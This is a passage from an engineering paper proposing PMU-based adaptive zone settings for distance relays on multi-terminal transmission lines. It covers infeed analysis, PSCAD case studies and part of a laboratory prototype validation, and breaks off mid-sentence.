B has q number of elements then the total number of relations defined from set A to set B is 2pq. 
A-1; write it separately, and you're done, The inverse matrix exists only for square matrices and it's unique. | A-1 ] all rights reserved. separate the desired inverse To find the Inverse of a 3 by 3 Matrix is a little critical job but can be evaluated by following few steps. resulting in (REDUCED) DIAGONAL FORM. The questions for the Inverse of matrix can be asked as, 1). The (i,j) cofactor of A is defined to be. If one of the pivoting elements is zero, then first interchange The following steps will produce the inverse of A, written A -1 . n-n in that order, with the goal of creating a copy Solution :-Hence exists. step is equivalent to step 2 on Pg 163 of our text Rolf, The first pivot encicled in red identity matrix Definition. C program to find Inverse of n x n matrix 2). abelian group augmented matrix basis basis for a vector space characteristic polynomial commutative ring determinant determinant of a matrix diagonalization diagonal matrix eigenvalue eigenvector elementary row operations exam finite group group group homomorphism group theory homomorphism ideal inverse matrix invertible matrix kernel linear algebra linear combination linearly … We say that A is invertible if there is an n × n matrix B such that elements in positions 1-1, 2-2, 3-3, continuing through Steps involved in the Example Ct) is called the adjoint of matrix a. The formula to find inverse of matrix is given below. The result of the second pivoting is below. A = We use this formulation to define the inverse of a matrix. = 5 – 2 – 21 = – 180. Insertion of n arithmetic mean in given two numbers, Important Questions CBSE Class 10 Science. The inverse of a 2×2 matrix take for example an arbitrary 2×2 matrix a whose determinant (ad − bc) is not equal to zero. equations. Let A be an n x n matrix. See our text (Rolf, Pg 163) for one example; below is another example : Note : THE MATRIX INVERSE METHOD for solving a system of equations will use Note the similarity between this method and GAUSS/JORDAN method, used to solve a system of equations. Row operations Det (a) does not equal zero), then there exists an n × n matrix. The inverse of a matrix is that matrix which when multiplied with the original matrix will give as an identity matrix. Below is the result of performing P1, so C program to find inverse of matrix 7). If this is the case, then the matrix B is uniquely determined by A, and is called the (multiplicative) inverse of A, denoted by A . The columns of the 3x3 identity matrix are colored blue Note : THE MATRIX INVERSE METHOD for solving a system of equations will use document.write(\"This page last updated on:\n\"+document.lastModified); Note 2 : Check out Prof McFarland's Note 3 : Compare the above 3 steps for See our text (Rolf, Pg 163) for one example; below is another example : Notice that is also the Moore-Penrose inverse of +.That is, (+) + =. Toggle Main Navigation RS Aggarwal Solutions for class 7 Math's, lakhmirsingh Solution for class 8 Science, PS Verma and VK Agarwal Biology class 9 solutions, Lakhmir Singh Chemistry Class 9 Solutions, CBSE Important Questions for Class 9 Math's pdf, MCQ Questions for class 9 Science with Answers, Important Questions for class 12 Chemistry, Madhya Pradesh Board of Secondary Education, Karnataka Secondary Education Examination Board, Differentiability of the function at a Point, Equation of normal to the curve at a given point, Equation of tangent line to a curve at a given point. from the above matrix: as you use row operations. 
A matrix 'A' of dimension n x n is called invertible only under the condition, if there exists another matrix B of the same dimension, such that AB = BA = I, where I is the identity matrix of the same order. Permutation of n object has some of repeated kind. Chapter 8. The following steps will produce the inverse of A, written A-1. The Relation between Adjoint and Inverse of a Matrix. the pivot (3-3 position) is now \"1\". Inverse of a matrix exists only if the matrix is non-singular i.e., determinant should not be 0. as in the example below. The inverse of a matrix. inverse of n*n matrix. It can be calculated by the following method: given the n × n matrix a, define b = bij to be the matrix whose coefficients are found by taking the determinant of the (n-1) × (n-1) matrix obtained by deleting the ith row and jth column of a. [ A | In ] For every m×m square matrix there exist an inverse of it. i.e., B = A -1 How to find Adjoint? F u and v be two functions of x, then the integral of product of these two functions is given by: If A and B are two finite set then the number of elements in either A or in B is given by, If A, B and C are three finite set then the number of elements in either set A or B or in C is given by. A-1 = Do solve NCERT text book with the help of Entrancei NCERT solutions for class 12 Maths. where the adj (A) denotes the adjoint of a matrix. Pivot on matrix P2. The inverse of a square n× n matrix A, is another n× n matrix denoted by A−1such that AA−1= A−1A = I where I is the n × n identity matrix. The matrix has the inverse if and only if it is invertible. Conventionally, a g-inverse of A is denoted by A-.In the sequel the statement \"G is an A-\" means that G is a g-inverse of A.So does the … The result of the third (and last) pivoting is below with augmented matrix will be the desired inverse, Not all square matrices have an inverse matrix. Elements of the matrix are the numbers which make up the matrix. where i is the identity matrix. Thus, our final step is to interactivePIVOT ENGINE That is, multiplying a matrix by its inverse produces an identity matrix. C Program to Find Inverse Of 3 x 3 Matrix 4). A non zero square matrix ‘A’ of order n is said to be invertible if there exists a unique square matrix ‘B’ of order n such that, A.B = B.A = I The matrix 'B' is said to be inverse of 'A'. C program to find inverse of a matrix 3). One is to use Gauss-Jordan elimination and the other is to use the adjugate matrix. Adjoint can be obtained by taking transpose of cofactor matrix of given square matrix. We follow definition given above. of P2 [ A | In ] Many classical groups (including all finite groups ) are isomorphic to matrix groups; this is the starting point of the theory of group representations . C Program to Find Inverse Of 4 x 4 Matrix 4). the 3x3 identity Example 1 : Find the inverse (if it exists) of the following:  1 2-2 Let be an m-by-n matrix over a field , where , is either the field , of real numbers or the field , of complex numbers.There is a unique n-by-m matrix + over , that satisfies all of the following four criteria, known as the Moore-Penrose conditions: + =, + + = +, (+) ∗ = +,(+) ∗ = +.+ is called the Moore-Penrose inverse of . Here you will get C and C++ program to find inverse of a matrix. C program to find inverse of matrix 7). C Program to find the Inverse of a Matrix 6). Inverse of a matrix. The n × n matrices that have an inverse form a group under matrix multiplication, the subgroups of which are called matrix groups. 
Formula to find inverse of a matrix. C Program to calculate inverse of a matrix 5). Matrix Calculator have all matrix functions having 'm' rows and 'n' columns. C Program to find the Inverse of a Matrix 6). Below is the result of performing Note the similarity Definition :-Assuming that we have a square matrix a, which is non-singular (i.e. The matrix below is NOT A-1 a non-zero pivot element, then the matrix A has no inverse. Below are the row operations of P2 Finally multiply 1/deteminant by adjoint to get inverse. Remember it must be true that: A × A-1 = I. as they re-appear on the left side Finding Inverse of 2 x 2 Matrix. A matrix that has no inverse is singular. Then calculate adjoint of given matrix. The inverse is: the inverse of a general n × n matrix a can be found by using the following equation. So, let us check to see what happens when we multiply the matrix by its inverse: And, hey!, we end up with the Identity Matrix!\n\nNone Found\n\nCategories" ]
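The adjoint/cofactor description above translates directly into code. The following C++ sketch is only an illustration of that method (it is not one of the "C Program" exercises listed on the page): it computes the determinant by cofactor expansion, builds the adjugate, divides by the determinant, and verifies that A x A-1 gives the identity matrix. The sample 3 x 3 matrix is made up for the demonstration.

```cpp
#include <cassert>
#include <cmath>
#include <cstdio>
#include <vector>

using Matrix = std::vector<std::vector<double>>;

// Minor matrix: copy of a with row i and column j removed.
Matrix minorMatrix(const Matrix& a, int i, int j) {
    const int n = static_cast<int>(a.size());
    Matrix m(n - 1, std::vector<double>(n - 1));
    for (int r = 0, mr = 0; r < n; ++r) {
        if (r == i) continue;
        for (int c = 0, mc = 0; c < n; ++c) {
            if (c == j) continue;
            m[mr][mc++] = a[r][c];
        }
        ++mr;
    }
    return m;
}

// Determinant by cofactor expansion along the first row.
double det(const Matrix& a) {
    const int n = static_cast<int>(a.size());
    if (n == 1) return a[0][0];
    double d = 0.0;
    for (int j = 0; j < n; ++j) {
        const double sign = (j % 2 == 0) ? 1.0 : -1.0;
        d += sign * a[0][j] * det(minorMatrix(a, 0, j));
    }
    return d;
}

// Inverse via adj(A)/det(A); returns false when A is singular.
bool inverse(const Matrix& a, Matrix& inv) {
    const int n = static_cast<int>(a.size());
    const double d = det(a);
    if (std::fabs(d) < 1e-12) return false;              // determinant zero: no inverse
    inv.assign(n, std::vector<double>(n));
    for (int i = 0; i < n; ++i)
        for (int j = 0; j < n; ++j) {
            const double cof = (((i + j) % 2 == 0) ? 1.0 : -1.0) * det(minorMatrix(a, i, j));
            inv[j][i] = cof / d;                         // transpose of cofactors = adjugate
        }
    return true;
}

int main() {
    Matrix a = {{2.0, 1.0, 1.0}, {1.0, 3.0, 2.0}, {1.0, 0.0, 0.0}};  // sample matrix, det = -1
    Matrix inv;
    if (!inverse(a, inv)) { std::puts("singular"); return 1; }
    // Verify A * A^-1 == I within rounding error.
    for (int i = 0; i < 3; ++i)
        for (int j = 0; j < 3; ++j) {
            double s = 0.0;
            for (int k = 0; k < 3; ++k) s += a[i][k] * inv[k][j];
            assert(std::fabs(s - (i == j ? 1.0 : 0.0)) < 1e-9);
        }
    std::puts("A * inv(A) == I verified");
    return 0;
}
```

Cofactor expansion grows factorially with n, so it is only sensible for small matrices; for anything larger, the Gauss-Jordan elimination sketched next is the practical choice.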
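The Gauss-Jordan procedure described above (augment A with the identity, pivot on the 1-1, 2-2, ... positions, interchange rows when a pivot is zero, and read A-1 off the right half) can be sketched the same way. This is again an illustrative C++ version, not the course material's own pivot engine:

```cpp
#include <cmath>
#include <cstdio>
#include <utility>
#include <vector>

using Matrix = std::vector<std::vector<double>>;

// Gauss-Jordan: reduce [A | I] to [I | A^-1]; returns false if A has no inverse.
bool gaussJordanInverse(Matrix a, Matrix& inv) {
    const int n = static_cast<int>(a.size());
    // Augment A with the n x n identity matrix.
    for (int i = 0; i < n; ++i) {
        a[i].resize(2 * n, 0.0);
        a[i][n + i] = 1.0;
    }
    for (int p = 0; p < n; ++p) {
        // If the pivot is (near) zero, interchange its row with a lower row.
        if (std::fabs(a[p][p]) < 1e-12) {
            int r = p + 1;
            while (r < n && std::fabs(a[r][p]) < 1e-12) ++r;
            if (r == n) return false;                 // no non-zero pivot: singular
            std::swap(a[p], a[r]);
        }
        // Scale the pivot row so the pivot becomes 1.
        const double piv = a[p][p];
        for (int c = 0; c < 2 * n; ++c) a[p][c] /= piv;
        // Eliminate the pivot column from every other row.
        for (int r = 0; r < n; ++r) {
            if (r == p) continue;
            const double f = a[r][p];
            for (int c = 0; c < 2 * n; ++c) a[r][c] -= f * a[p][c];
        }
    }
    // The right half of the augmented matrix is now A^-1.
    inv.assign(n, std::vector<double>(n));
    for (int i = 0; i < n; ++i)
        for (int j = 0; j < n; ++j) inv[i][j] = a[i][n + j];
    return true;
}

int main() {
    Matrix a = {{4.0, 7.0}, {2.0, 6.0}};              // det = 10, so the inverse exists
    Matrix inv;
    if (gaussJordanInverse(a, inv))
        std::printf("%.3f %.3f\n%.3f %.3f\n", inv[0][0], inv[0][1], inv[1][0], inv[1][1]);
    return 0;
}
```

The 2 x 2 test case reproduces the swap/negate/divide-by-determinant rule stated earlier: the inverse of [[4, 7], [2, 6]] is [[0.6, -0.7], [-0.2, 0.4]].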
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8824209,"math_prob":0.9959956,"size":15253,"snap":"2021-04-2021-17","text_gpt3_token_len":3912,"char_repetition_ratio":0.1884058,"word_repetition_ratio":0.120354585,"special_character_ratio":0.25070477,"punctuation_ratio":0.10566615,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998497,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-15T08:24:27Z\",\"WARC-Record-ID\":\"<urn:uuid:cf6d072a-3933-45f4-a7ba-726be4c67a2f>\",\"Content-Length\":\"48903\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eaa9861f-d29c-4b4c-a057-96b1340761ca>\",\"WARC-Concurrent-To\":\"<urn:uuid:251cb6ca-d399-4ba3-9e78-1d77c0b0709c>\",\"WARC-IP-Address\":\"185.148.72.222\",\"WARC-Target-URI\":\"https://www.travel-rs.info/5n6ryh35/article.php?7a495e=inverse-of-n-n-matrix\",\"WARC-Payload-Digest\":\"sha1:BQZH6AMPAAF2ACLBRNQQNEGOZQ2LC7JF\",\"WARC-Block-Digest\":\"sha1:GWGLLC6WEKM3PFNVYRAWTV27GJHLPVHX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038084601.32_warc_CC-MAIN-20210415065312-20210415095312-00386.warc.gz\"}"}
https://pcmp.springeropen.com/articles/10.1186/s41601-018-0087-z
[ "# PMU based adaptive zone settings of distance relays for protection of multi-terminal transmission lines\n\n## Article metrics\n\n• 1307 Accesses\n\n• 1 Citations\n\n## Abstract\n\nThis paper proposes Phasor Measurement Unit (PMU) based adaptive zone settings of distance relays (PAZSD) methodology for protection of multi-terminal transmission lines (MTL). The PAZSD methodology employs current coefficients to adjust the zone settings of the relays during infeed situation. These coefficients are calculated in phasor data concentrator (PDC) at system protection center (SPC) using the current phasors obtained from PMUs. The functioning of the distance relays during infeed condition with and without the proposed methodology has been illustrated through a four-bus model implemented in PSCAD/EMTDC environment. Further, the performance of the proposed methodology has been validated in real-time, on a laboratory prototype of Extra High Voltage multi-terminal transmission lines (EHV MTL). The phasors are estimated in PMUs using NI cRIO-9063 chassis embedded with data acquisition sensors in conjunction with LabVIEW software. The simulation and hardware results prove the efficacy of the proposed methodology in enhancing the performance and reliability of conventional distance protection system in real-time EHV MTLs.\n\n## Introduction\n\nTransmission lines are occassionally tapped to provide intermediate connections to loads or reinforce the underlying lower voltage network through a transformer. Such a configuration is known as multi-terminal transmission lines. For strengthening the power system, MTLs are frequently designed as a temporary and inexpensive measure. However, they can cause problems in the protective system .\n\nAs a part of a continuous endeavor to eliminate the problems caused by MTLs and enhance the reliability of the protective system, many protection methodologies have been developed. A few of them are discussed here. Abe et al. developed asynchronous measurements based protection methodology for fault location in MTLs. The MTLs have been transformed into two terminal lines to achieve fault location accurately. Nagasawa et al. have proposed an algorithm for protection of parallel MTLs using asynchronous differential currents at each terminal. Though the algorithms proposed by the authors [2, 3] performed well, their accuracy may be affected by unbalance in the line parameters when different fault conditions occur. Funbashi et al. have proposed methods to identify the fault point in double circuit MTL using measurements from capacitor voltage transformer (CCVT) and current transformer (CT). However, for accurate fault location, measurements are required from all the terminals. In , Qiu et al. have developed a multi-agent algorithm for protection of MTLs. It consists of organization agent, coordination agent and executive agent. They exchange the information among themselves regarding trip information. However, lack of global synchronous measurements acquired from different agents may lead to mal-operation of the relay. Gajic et al. have proposed differential protection with innovative charging current compensation algorithm for MTL protection. However, the reliability of the algorithm depends on the availability of the current channels.\n\nForford et al. have designed differential current algorithm for protection of MTLs. The proposed algorithm can differentiate internal fault, external fault and normal load conditions using electric mid-point (EMP). 
Arbes [8] has developed a differential line protection scheme for the protection of double lines, tapped lines and short lines. However, the performance of the proposed scheme depends on the local voltage and current measurements. Al-Fakhri [9] has proposed a differential protection methodology against internal and external faults using asynchronous measurements. Hussain et al. [10] have proposed a fault location scheme for MTLs using positive sequence voltage and current measurements; however, the synchronization process may be affected by metering errors. For reliable operation of the proposed methods [9, 10], precise time synchronization of the analog information between the line ends is required for the differential calculation to be accurate.\n\nIn addition to voltage and current based methodologies [2,3,4,5,6,7,8,9,10], traveling wave-based protection schemes have been proposed for MTL protection [11, 12]. The authors of [11] have used a single traveling wave together with fundamental measurements for fault location in MTLs; however, the performance of the methodology will be affected by arcing faults and variation in fault impedance. In [12], Zhu et al. developed a current traveling wave based algorithm in which fault detection and location are accomplished using the arrival time of current waves at a terminal.\n\nTechnological developments in measurement, communication, control and monitoring of power grids have brought a paradigm shift in the protection philosophy of transmission lines. The reliability of the power system has been enhanced by early detection of wide-area disturbances and optimal utilization of assets. Some of the protection methodologies based on Synchrophasor measurements are discussed here. Lien et al. [13] demonstrated the performance of a PMU based fault location algorithm on MTLs, in which faults are identified and located using synchronized positive sequence voltage and current phasors. Further, for accurate fault detection and location in MTLs, Brahma [14] has employed time-stamped voltage and current phasors obtained from all the terminals. Ting Wu et al. [15] have developed a novel fault location technique for multi-section non-homogeneous transmission lines. However, the accuracy of [14, 15] may be lost in the case of medium and long MTLs. For decades, distance protection has been widely employed for the protection of transmission lines as it is simple and fast. Distance protection can protect most of the protected line, and it is virtually independent of the source impedance. However, the performance and the reliability of distance protection are influenced by infeed and outfeed currents in MTLs [16,17,18].\n\nIn this paper, a PMU based adaptive zone settings of distance relays (PAZSD) methodology has been proposed to improve the performance and the reliability of distance protection by adjusting zone settings adaptively. The PAZSD methodology employs current coefficients to adjust the zone settings of the distance relays during infeed situations. These coefficients are calculated in the phasor data concentrator (PDC) at the system protection center (SPC) using the magnitudes of the current phasors obtained from PMUs. The functioning of the distance relays during infeed condition with and without the proposed methodology has been demonstrated through different fault case studies carried out on a four-bus model in the PSCAD/EMTDC environment. Further, a laboratory prototype of EHV MTLs is considered to validate the performance of distance relays during infeed condition. 
For phasor estimation, PMUs are realized in real-time using NI cRIO-9063 chassis embedded with data acquisition sensors (NI-9225 & NI-9227) and Global Positioning System (GPS) synchronisation module (NI-9467) in conjunction with LabVIEW software. The results indicate that the proposed PAZSD methodology can improve the performance and the reliability of conventional distance protection during infeed situations under different fault conditions.\n\n## Synchrophasor Technology\n\nThe cutting-edge Synchrophasor technology entails estimation of time-stamped phasor measurements on GPS time reference. It has been used to provide accurate information regarding the state of the power system for implementing immediate corrective actions. The process of phasor estimation starts with a sampling of an analog signal (x(t)) at a sampling frequency fs (= Nfo). With this sampling frequency, N number of samples per cycle are obtained. The time-stamped fundamental phasors of three-phase voltage and current signals per cycle are estimated using the Discrete Fourier Transform (DFT) . In general, the kth estimation of the original signal is given by Eq. 1.\n\n$${X}_k=\\frac{\\sqrt{2}}{N}\\sum \\limits_{n=0}^{N-1}x\\left(n\\Delta T\\right){e}^{-j\\frac{2\\pi kn}{N}}$$\n(1)\n\nwhere x(n∆T) is sampled version of x(t) (voltage or current analog signals),\n\n∆T is sampling time in seconds,\n\nfo is nominal frequency (Hz),\n\nT is time period in seconds,\n\nN is number of samples per cycle,\n\nn is sample number starting from n = 0 to N-1,\n\nFor k = 1, X k gives the fundamental frequency phasor.\n\nA concise description of the infeed problem encountered by distance protection in MTLs and proposed solution (PAZSD methodology) under different fault conditions are discussed in the following section.\n\n## Methods\n\nFig. 1 shows a part of an interconnected power system for illustrating the effect of infeed on the performance of distance relays. Let the distance relays protecting the lines i-l and l-j are R il & R li , and R lj & R jl respectively. Likewise, the distance relays of the teed terminal l-k are R lk and R kl . Assume PMUs are installed at all the buses which communicate to the PDC at SPC through a modem and fiber optical cables. Assuming the currents Ip and Iq are in phase. For illustration purpose, the PMUs at Bus i and k are considered.\n\n### Infeed effect\n\nIn order to explain the infeed effect, only relays are assumed to be present in the above power system network (No PMUs, PDC and SPC are present). Assume that a fault has occurred on the line l-j at a point D as shown in Fig. 1. The resultant currents are indicated in Fig. 1. Under such conditions, the impedance observed by the relay R il at Bus i is obtained using KVL:\n\n$${V}_i={I}_p\\left({Z}_{il}+{Z}_{lD}\\right)+{I}_q{Z}_{lD}$$\n(2)\n$$\\frac{V_i}{I_p}=\\left({Z}_{il}+{Z}_{lD}\\right)+\\frac{I_q}{I_p}{Z}_{lD}$$\n(3)\n$$\\mathrm{Let}\\kern1.25em {Z}_{il}+{Z}_{lD}={Z}_{iD}$$\n$$\\frac{V_i}{I_p}={Z}_{iD}+\\kern0.5em \\frac{I_q}{I_p}{Z}_{lD}$$\n(4)\n\nwhere.\n\nV i is voltage at a Bus i,\n\nZ il is the impedance of transmission line i-l,\n\nZ lD is impedance of transmission line l-j from Bus l to the fault point D,\n\nI p is current flowing from Bus i to l,\n\nI q is current flowing from Bus k to l,\n\nFrom Eq. (4), it is observed that the impedance seen by the relay R il is more than the impedance observed (Z iD ) when there is infeed. Therefore, the relay R il under reaches during fault condition. 
The main cause for such phenomenon is that the relay R il cannot sense the current (I q ) flowing from Bus k to l. The amount of under reach depends on the magnitude of current I q .\n\nTo address the above infeed issue and to ensure reliable operation of the relay R il , the subsequent section proposes the PAZSD methodology. This proposed methodology guides the relay to change the zone settings according to the infeed conditions using Synchrophasor technology. The PAZSD methodology which is executed in the PDC sends the new zone settings to the corresponding relay to ensure reliable operation during the infeed condition.\n\n### Flowchart of proposed PAZSD methodology\n\nThe sequence of execution of the proposed PAZSD methodology, as shown in Fig. 1, is illustrated in step by step manner to eliminate the infeed problem as discussed in the previous section.\n\nStep 1: Synchronized time-stamped voltage and current phasor data are estimated in the PMU at Bus i and k, and transmitted to PDC at SPC.\n\nStep 2: In PDC, three-phase current coefficients (K1, K2 and K3) are calculated from the magnitudes of the current phasors using Eqs. (5) to (7)\n\n$${K}_1=\\frac{\\mid {I}_{Ri}\\mid +\\mid {I}_{Rk}\\mid }{\\mid {I}_{Ri}\\mid }$$\n(5)\n$${K}_2=\\frac{\\mid {I}_{Yi}\\mid +\\mid {I}_{Yk}\\mid }{\\mid {I}_{Yi}\\mid }$$\n(6)\n$${K}_3=\\frac{\\mid {I}_{Bi}\\mid +\\mid {I}_{Bk}\\mid }{\\mid {I}_{Bi}\\mid }$$\n(7)\n\nStep 3: If K1 ≈ K2 ≈ K3, adjust the reach settings of the relay R il using Eq. (8).\n\n$${Z}_{\\mathrm{set}\\hbox{-} \\mathrm{new}}={K_1}^{\\ast }\\ {Z}_{\\mathrm{set}\\hbox{-} \\mathrm{old}}$$\n(8)\n\nElse if K1> (K2 & K3), adjust the reach settings of the relay R il using Eq. (9).\n\n$${Z}_{\\mathrm{set}\\hbox{-} \\mathrm{new}}={K_1}^{\\ast }\\ {Z}_{\\mathrm{set}\\hbox{-} \\mathrm{old}}$$\n(9)\n\nElse if K2> (K1 & K3), adjust the reach settings of relay R il as given in Eq. (10).\n\n$${Z}_{\\mathrm{set}\\hbox{-} \\mathrm{new}}={K_2}^{\\ast }\\ {Z}_{\\mathrm{set}\\hbox{-} \\mathrm{old}}$$\n(10)\n\nElse adjust the reach settings of the relay R il as given in Eq. (11).\n\n$${Z}_{\\mathrm{set}\\hbox{-} \\mathrm{new}}={K_3}^{\\ast }\\ {Z}_{\\mathrm{set}\\hbox{-} \\mathrm{old}}$$\n(11)\n\nwhere.\n\nK1K2K3 are current cofficients for infeed condition,\n\nI Ri , I Yi & I Bi are three-phase current phasors flowing from Bus i to l,\n\nI Rk , I Yk & I Bk are three-phase current phasors flowing from Bus k to l,\n\nZset-old are old three zone reach settings of the relay R il ,\n\nZset-new are new three-zone reach settings of the relay R il with infeed line (between Bus k and l).\n\nThe following section describes the implementation of the proposed PAZSD methodology on a four-bus system to eliminate the infeed problems as discussed in section 3.1.\n\n### Case studies\n\nA four-bus model shown in Fig. 2 is considered and implemented in PSCAD/EMTDC software. Various case studies (Case 1, Case 2 and Case 3) are conducted to illustrate the functioning of distance relays for infeed condition. The base MVA and kV of the system are 100 and 400 (line to line) respectively. The positive sequence resistance, inductive and capacitive reactance of the transmission line are 0.0234 Ω/km, 0.298 Ω/km, and 256.7 kΩ*km respectively. The values of negative sequence parameters are same as that of the positive sequence parameters. Similarly, the values of zero sequence resistance, inductive and capacitive reactance of the transmission lines are 0.388 Ω/km, 1.02 Ω/km, and 376.6 kΩ*km respectively. 
The length of each transmission line is 350 km. The zone settings of the distance relays are given in Table 1. Assume PMUs are installed at all buses.\n\n#### Performance of distance relays without PAZSD methodology during infeed condition\n\nThree case studies (Case 1, Case 2 and Case 3), as shown in Fig. 2, are considered to illustrate the performance of the distance relay R12 without PAZSD methodology. Assuming that no PMU, PDC and SPC technology are present in the case studies.\n\n### Case 1\n\nAssume that a triple line fault (RYB) occurred at a distance of 10 km from Bus-1. In other words, in Zone-1 of the relay R12 and Zone-2 of the relay R21. For such condition, the impedance trajectory of the distance relays, R12, R21, and R23, is portrayed in Fig. 3.\n\nFrom Fig. 3, the relays R12 and R21 have observed the impedance in Zone-1 and Zone-2 respectively. Whereas, the relay R23 has not observed the impedance in any of its zones. Hence, it is clear that none of the relays are affected by the infeed condition and the respective relays have correctly detected a fault condition.\n\n### Case 2\n\nA double line to ground fault (RYG) is created at a distance of 500 km from Bus-1 (i.e., 150 km from Bus-2). This indicates the relays R12 and R23 should detect the fault in Zone-2 and Zone-1 respectively. The corresponding impedance trajectory of the relays R12, R21 and R23 is shown in Fig. 4. From Fig. 4, it is observed that the relay R12 has observed the trajectory in Zone-3 whereas the relay R23 has observed in Zone-1. The relay R21 has not observed the trajectory in any of its zone due to its inherent directional property. Therefore, it is understood that the infeed at Bus-2 has caused the relay R12 to mal-operate.\n\n### Case 3\n\nA double line fault (RY) is created at a distance of 200 km from Bus-2 which lies in Zone-3 of the relay R12 and Zone-1 of the relay R23. For this event, impedance trajectory observed by the relays, R12, R21 and R23 are shown in Fig. 5. From figure, it is concluded that the relays R12 and R21 have not seen the impedance in any of their zones. Whereas, the relay R23 has seen the impedance in Zone-1. Therefore, it is clearly known that the infeed at Bus-2 has influenced the relay R12 to mal-operate.\n\nFrom the above three case studies, it is clear that the performance of the relay is affected by the infeed at Bus-2 when a fault occurs on the line 2–3.\n\n#### Performance of distance relays with proposed PAZSD methodology during infeed condition\n\nThe case studies discussed in the previous subsection are reconsidered with the implementation of the proposed PAZSD methodology using PMUs and PDC. The same four-bus system is considered, and the proposed PAZSD methodology is implemented in PDC at SPC with the data acquired from each PMU. Once the current coefficients (K1, K2, and K3) are estimated in PDC, the new zone settings are calculated and communicated back to the corresponding relay. The following case studies prove the advantages of the proposed methodology to eliminate the infeed problem discussed in the previous section.\n\n### Case 1\n\nA triple line fault (RYB) is created with the same fault conditions as discussed in section 3.3.1.1. The relay zone settings (Zset-old) are shown in Table 2. The current coefficients (K1, K2, and K3) and new zone settings estimated for the above fault condition are tabulated in Table 2 (according to the methodology proposed in section 3.2). 
These new zone settings are updated in the respective relays, and the relay operate as per the new settings. The impedance trajectory of the distance relays, R12, R21, and R23 is portrayed in Fig. 6. From Fig. 6, the relays R12 and R21 have observed the impedance in Zone-1 and Zone-2 respectively. Whereas, the relay R23 has not observed the impedance in any of its zones. Hence, it is clear that none of the relays are affected by the infeed condition and the respective relays have properly detected the fault condition with new zone settings.\n\n### Case 2\n\nA double line to ground fault (RYG) is considered with same fault conditions as discussed in section 3.3.1.2. The estimated current coefficients (K1, K2, and K3) and new zone settings and tabulated in Table 2. The values of current coefficients K1, K2 and K3 are 1.82, 1.79 and 1.9 respectively. Since K3 > (K1 & K2), as per the proposed methodology the new zone settings of the relay R12 (Relayset-new = K3*Relayset-old) are 12.449 + j158.536, 23.342+ j297.255 and 32.678+ j416.157. The impedance trajectory of relays R12, R21 and R23 are shown in Fig. 7, and it is clear that the relay R12 has detected the fault in Zone-2. From these case studies (3.3.1.2 & 3.3.2.2) it is observed that because of implementation of the proposed methodology, the relay R12 could detect the fault condition in Zone-2 (instead of Zone-3), which averts the mal-operation of the relay.\n\n### Case 3\n\nA double line fault (RY) is considered with same fault conditions as discussed in section 3.3.1.3. The current coefficients (K1, K2, and K3) and new zone settings estimated for the above fault condition are tabulated in Table 2. The values of the current coefficients K1, K2 and K3 are 1.8, 1.78 and 1.89 respectively. Since K3 > (K1 & K2), as per the proposed methodology the zone settings of the relay R12 (Relayset-new = K3*Relayset-old) are 12.383 + j157.702, 23.219 + j295.691 and 32.506 + j413.967. The impedance trajectory is shown in Fig. 8 and it is clear that the relay R12 has detected the fault in Zone-3. From these case studies (3.3.1.3 & 3.3.2.3) it is observed that because of implementation of the proposed methodology the relay R12 could detect the fault condition properly in Zone-3, which averts the mal-operation of the relay.\n\nFrom the above case studies, it is understood that the performance of the relay R12 is satisfactory with new zone settings when a fault occurs on the line 1–2. However, the performance of the relay R12 has been corrected by the proposed PAZSD methodology when a fault occurs on the line 2–3. Therefore, the performance of distance relay (R12) has been enhanced during the infeed condition with the help of the proposed methodology.\n\nIn the subsequent section, the efficacy of the proposed PAZSD methodology in enhancing the performance and reliability of the distance relay is validated in real-time on a laboratory prototype model of EHV MTL.\n\n## Results and discussion\n\nA scale down laboratory prototype model of EHV MTL is shown in Fig. 9. As shown in figure, two three-phase 440 V, 50 Hz power supplies are connected to Bus B1 and B4 through autotransformers. The autotransformer steps down the supply voltage from 440 V to 110 V at 50 Hz. A three-phase variable load of 3.75 kW is connected at the receiving end (Bus B3). PMUs are connected at all buses.\n\nThe length of the transmission lines 1–2 and 2–3 is 200 km each with the Π-model transmission line. 
Each 200 km transmission line is divided into four 50 km Π-sections connected in series. The parameters of the transmission line per 50 km are considered with resistance 1.8 Ω, inductance 10.07 mH and capacitance 2.2 μF. PMUs are implemented using NI cRIO-9063 chassis embedded with NI-9225 Voltage, NI-9227 Current and NI-9476 GPS modules programmed in LabVIEW FPGA software. As shown in Fig. 9, the three-phase voltage and current phasors are acquired from PMUs and communicated to the PDC. The sampling frequency of NI cRIO-9063 considered for phasor estimation is 2 kHz. To evaluate the performance of distance relay (RA), numerous faults with different fault impedances (0.2 Ω, 1.7 Ω, and 4.9 Ω) are simulated and discussed in the following section.\n\n### Real-time performance analysis of the conventional distance relay without PAZSD methodology\n\nThe zone settings of the relay RA are calculated for 400 km and tabulated in Table 3.\n\nThe following conditions are used to detect the zone of fault point.\n\n$$\\mathrm{Zone}\\hbox{-} 1:\\kern1em \\mathrm{If}\\mid {\\mathrm{Z}}_{\\mathrm{Calculate}\\hbox{-} 1}\\mid <11.647$$\n(1)\n\nwhere |ZCalculate-1| is the distance from the center of Zone-1 circle to the fault point.\n\n$$\\mathrm{Zone}\\hbox{-} 2:\\kern1em \\mathrm{If}\\ 11.647<\\mid {\\mathrm{Z}}_{\\mathrm{Calculated}\\hbox{-} 2}\\mid <21.8388$$\n(2)\n\nwhere |ZCalculate-2| is the distance from the center of Zone-2 circle to the fault point.\n\nThe performance of the distance relay RA without the proposed methodology is evaluated for various faults with different fault impedances (0.2 Ω, 1.7 Ω and 4.9 Ω) and tabulated in Tables 4, 5 and 6.\n\nFrom Table 4, for example, consider an LG fault occurred at 50 km from Bus B1. The corresponding impedance observed by the relay RA is 3.961265.2140. The relay RA has seen the impedance in Zone-1 since the magnitude of the impedance is less than 11.647 (Condition 1). Therefore, the relay operates as per its settings. Figure 10 displays the LabVIEW front panel for relay RA in PDC at SPC (without the proposed methodology). For the case study, LabVIEW front panel displays a glowing LED for Zone-1 fault. Figure 10 also shows the voltage and current phasor data acquired from PMUs at B1 and B4, and the calculated impedance. A similar explanation holds good for LL fault at 50 km, LLG & LLL faults at 150 km from Bus B1 as given in Table 